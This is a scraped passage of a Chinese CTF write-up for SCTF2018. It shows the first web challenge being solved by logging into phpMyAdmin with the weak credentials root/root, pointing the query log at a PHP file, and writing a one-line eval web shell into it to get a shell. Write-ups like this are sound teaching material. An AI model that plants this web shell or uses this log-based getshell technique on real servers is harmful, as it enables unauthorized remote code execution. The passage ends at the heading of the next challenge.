1. 程式人生 > >Writeup | SCTF2018 |CTF 比賽 |By Jas502n

Writeup | SCTF2018 |CTF 比賽 |By Jas502n

lte inf 輕松 php @ dmi 弱口令 IE 利用 img

__________WEB_____________

0x01 easiest web – phpMyAdmin

Ps: 思路弱口令(root / root)登陸phpmyadmin,利用日誌功能進行getshell

送分題,輕松一下

http://47.97.214.247:20001/phpmyadmin

Alternate address:

http://218.245.4.98:20000/phpmyadmin

技術分享圖片

開啟日誌,寫入一句話

技術分享圖片

查詢sql語句

<?php @eval($_POST[‘cmd‘]);?>

日誌寫入到網站路徑下的dasdasdas.php文件

然後就getshell

技術分享圖片

http://218.245.4.98:20000/dasdasdad.php

密碼:cmd

菜刀連接

技術分享圖片

在C盤發現flag

技術分享圖片

sctf{31cf2213cc49605a30f07395d6e5b9c4}

0x02 新的建議板

Writeup | SCTF2018 |CTF 比賽 |By Jas502n